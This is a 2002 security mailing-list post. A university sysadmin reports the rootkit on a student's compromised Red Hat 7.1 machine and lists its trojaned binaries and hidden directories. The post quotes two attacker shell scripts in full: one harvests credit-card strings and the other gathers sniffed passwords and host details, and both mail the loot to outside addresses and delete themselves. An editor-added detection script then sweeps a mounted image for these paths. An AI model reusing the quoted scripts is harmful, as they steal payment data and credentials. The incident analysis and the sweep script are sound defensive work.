questions about a rooted RH7.1 box

From: Christopher Albert (sysadmin@DMS.UMontreal.CA)
Date: 04/12/02


Date: Fri, 12 Apr 2002 17:02:52 -0400
From: Christopher Albert <sysadmin@DMS.UMontreal.CA>
To: incidents@securityfocus.com

Greetings,
One of the students here got his home box rooted last week. Before he
reinstalled I asked him to let me have a look at his box, which I could
only do remotely. I took a look at it yesterday for about twenty minutes
and collected some stuff, but I had him pull it offline before
grave-robber and I were finished because the box seemed just too
poisoned and I wasn't comfortable staying connected. I have some
questions about what I found, and was wondering if the tools I found
were from a familiar rootkit.

1. Most of the attack tools were in:

/usr/lib/.lib : libdi libdu libfh libne libnh libvd
    libdi = libvd   # The 'ls' trojan
    libdu =         # The 'top' trojan
    libne =         # The 'netstat' trojan

The 'ps' trojan was in: /usr/lib/libc/libp

/usr/lib/sn : * .sys .X
/usr/lib/ld : * chat .cv .X

.X = # Sorts the output from LinSniffer 0.03 [BETA] by Mike Edulla
     <medulla@infosoc.com>, and .sys was its output file.

'chat' seemed to be 'chattr', which was removed from the system.

.cv was the output of a script in /usr/man/.../ looking for credit card
numbers.

/usr/man/.../: .c .m   # I'll paste these scripts at the end, since they
                       # are revealing.

In addition, /usr/bin/kernel seemed to be a trojan sshd, running on
ports 6010 and 6011.

The scripts .c and .m are:

/usr/man/.../.c
#!/bin/bash
hh="r0ot@emoka.ro"
egrep -ir 'mastercard|visa' /home|egrep -v cache >> /usr/lib/ld/.cv
egrep -ir 'mastercard|visa' /var|egrep -v cache >> /usr/lib/ld/.cv
egrep -ir 'mastercard|visa' /root|egrep -v cache >> /usr/lib/ld/.cv
if [ -d "/www" ]; then
egrep -ir 'mastercard|visa' /www >> /usr/lib/ld/.cv
fi
if [ -d "/var/www" ]; then
egrep -ir 'mastercard|visa' /var/www >> /usr/lib/ld/.cv
fi
if [ -f "/usr/lib/ld/.cv" ]; then
/sbin/ifconfig | grep inet | awk '{print $2}'| cut -d: -f2 | grep -v
"127.0.0." | grep -v "192.168.0." >> /usr/lib/ld/.cv
hostname -f >> /usr/lib/ld/.cv
cat /usr/lib/ld/.cv | mail -s "cronmonthly" $hh
rm &> /dev/null -rf /usr/lib/ld/.cv
fi
rm &> /dev/null -rf /usr/man/.../.c

#!/bin/bash
#/usr/man/.../.m
#
cs="blackeyero@yahoo.com"
dp="/usr/lib/ld"
db="/usr/share/rht/..."
wd="/usr/man/.../.w"
ml="/usr/man/.../.m"
if [ -f "$dp/.i" ]; then
cat $dp/.i >> $dp/.pw
fi
if [ -f "$bla2/.o" ]; then
cat $dp/.o >> $dp/.pw
fi
/sbin/ifconfig | grep inet | awk '{print $2}'| cut -d: -f2 | grep -v
"127.0.0." | grep -v "192.168.0." >> $dp/.d
hostname -f >> $dp/.d
cat $dp/.pw >> $dp/.d
if [ -f "/etc/hosts" ]; then
cat /etc/hosts >> $dp/.d
fi
cat $dp/.d | mail -s "cronstate" $cs
cat $dp/.pw >> $db/.p
rm &> /dev/null -rf $dp/.pw $dp/.d $wd $ml

Thought this might be of interest to the group.

Chris

-- 
--------------------------------------------------------------------
                     Christopher Albert
            Responsable des services informatiques
         Departement de mathematiques et de statistique
                  Universite de Montreal

bureau 6188, Pavillon Andre-Aisenstadt
Tel: (514) 343-2281   Fax: (514) 343-5700
--------------------------------------------------------------------

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more
information on this free incident handling, management and tracking system
please see: http://aris.securityfocus.com
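The post lists the drop locations this kit used (hidden directories under /usr/lib, the /usr/man/... directory, the trojan sshd at /usr/bin/kernel) and two scripts whose mail subjects ("cronmonthly", "cronstate") suggest they were driven from cron. An editor-added example follows; it is not part of Christopher Albert's message or of any named rootkit. It sweeps a filesystem root for those paths so the check can be run against a mounted image of the victim disk rather than on the live, trojaned system where ls and ps cannot be trusted. The path list is transcribed from the report; the cron check, and the assumption that cron was the persistence mechanism, are mine.

```shell
#!/bin/sh
# Editor-added example, not code from the original post.
# Sweep a (mounted, offline) filesystem root for the drop paths the
# report describes:   sh sweep.sh /mnt/victim
# Paths come from the report. Treating cron as the persistence mechanism
# is an assumption drawn from the "cronmonthly"/"cronstate" mail subjects.

# Drop directories and files named in the report, relative to the root.
IOC_PATHS="usr/lib/.lib usr/lib/libc/libp usr/lib/sn usr/lib/ld \
usr/man/... usr/share/rht/... usr/bin/kernel"

# Print every IOC path that exists under ROOT (default /), one per line.
find_iocs() {
    root=${1:-/}
    for p in $IOC_PATHS; do
        if [ -e "$root/$p" ]; then
            printf '%s\n' "$root/$p"
        fi
    done
    return 0
}

# Print the number of IOC paths present under ROOT.
count_iocs() {
    root=${1:-/}
    n=0
    for p in $IOC_PATHS; do
        [ -e "$root/$p" ] && n=$((n + 1))
    done
    echo "$n"
}

# Print cron files under ROOT that reference the attacker's directories.
# Looks in the usual Red Hat cron locations (assumed persistence path).
find_cron_refs() {
    root=${1:-/}
    for d in etc/crontab etc/cron.d etc/cron.hourly etc/cron.daily \
             etc/cron.weekly etc/cron.monthly var/spool/cron; do
        [ -e "$root/$d" ] || continue
        grep -rl -e '/usr/man/\.\.\.' -e '/usr/lib/ld' -e '/usr/lib/sn' \
            "$root/$d" 2>/dev/null || :
    done
    return 0
}

# When run with a root argument, report; with none, only define the functions.
if [ -n "${1:-}" ]; then
    echo "IOC paths present under $1: $(count_iocs "$1")"
    find_iocs "$1"
    echo "cron files referencing attacker directories:"
    find_cron_refs "$1"
fi
```

Run it against a mounted image (or a second system you want to clear), not against the live box: the kit replaced ls, ps, top and netstat, so anything those tools report from the compromised host is suspect. A hit on any of these paths is a reason to rebuild rather than clean; the scripts above show the attacker was already mailing out whatever they found.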